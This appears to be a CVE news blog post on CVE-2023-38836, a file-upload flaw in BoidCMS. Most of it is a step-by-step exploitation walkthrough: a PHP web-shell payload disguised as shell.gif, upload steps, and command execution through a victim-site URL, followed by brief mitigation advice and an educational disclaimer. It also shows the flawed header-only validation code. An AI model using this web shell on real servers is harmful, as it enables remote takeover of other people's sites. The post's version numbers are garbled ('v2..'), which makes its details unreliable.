CVE CyberSecurity Database News

CVE-2023-38836 - Exploiting BoidCMS v2.. File Upload Vulnerability With GIF Header Bypass

Poster -

Web servers often allow users to upload files — such as photos, avatars, or documents. To keep things secure, good file upload systems will check the type of file being uploaded to block scripts or malicious code. But sometimes, this check can be tricked. In 2023, a serious vulnerability was found in BoidCMS v2.., a lightweight content management system: CVE-2023-38836. Attackers can bypass file type checks using a simple trick: adding a GIF header to their upload.

Affected Version: 2..

- CVE ID: CVE-2023-38836

Vector: Remote (via file upload)

This vulnerability allows an attacker to upload malicious code by disguising it as a safe image file (e.g., a .gif), which results in arbitrary code execution on the server.

How the Vulnerability Works

Most web applications check the MIME type and file extension of uploads (like .jpg, .png, .gif). But some only look at the start of the file. If your file begins with GIF89a (the header for GIF images), the server might think your file is an image, even if the rest is PHP or other code.

Typical Bad Check (pseudo-code)

<?php
// BAD: Only checks first bytes, thinks it's a GIF
$file = $_FILES["upload"]["tmp_name"];
$header = fread(fopen($file, "r"), 6);
if ($header === "GIF89a") {
    // Accept file!
    move_uploaded_file($file, $target);
}

Sample Payload: shell.gif

GIF89a
<?php
if(isset($_GET['cmd'])){
  system($_GET['cmd']);
}
?>

The GIF89a is the signature seen at the start of every GIF file. The server's weak check looks for this string, accepts the upload, but the content is still executable PHP.

Create a file called shell.gif with the following contents

GIF89a
<?php
if(isset($_REQUEST['cmd'])){
  echo "<pre>";
  system($_REQUEST['cmd']);
  echo "</pre>";
}
?>

You can also use hex editors or command-line tools to make sure the first six bytes spell GIF89a.

Log into the vulnerable BoidCMS instance (or, if file upload is public, just use the upload form)

- Go to the upload page (e.g., /admin/pages or similar).

Select your shell.gif file.

- Submit/upload.

3. Find the Uploaded File

BoidCMS typically saves uploads in an accessible public web folder.

E.g.
http://victim-site.com/uploads/shell.gif

Now you can run commands on the victim server via the shell, like this

http://victim-site.com/uploads/shell.gif?cmd=whoami

Result: The page will show the web server user, demonstrating code execution.

Mitigation and Recommendations

- Upgrade: The vendor patched this bug after 2... Always run the latest BoidCMS version.
- Server Configuration: Block direct access to uploaded files or restrict execution of uploaded content (.php, .phtml, etc.).
- File Validation: Use libraries like PHP’s getimagesize() to verify true image files, not just headers.

References

- CVE-2023-38836 in NVD
- BoidCMS on GitHub
- Official Patch/Commit
- Public vulnerability report


In short:
*CVE-2023-38836 is a serious bug in BoidCMS that lets anyone upload malicious code masked as a GIF file, leading to a full website takeover. Always update your software and never trust just the file magic or extension for uploads!*


Disclaimer:
This post is for educational purposes only. Always have permission before testing on any system.

Timeline

Published on: 08/21/2023 17:15:47 UTC
Last modified on: 10/10/2023 17:15:12 UTC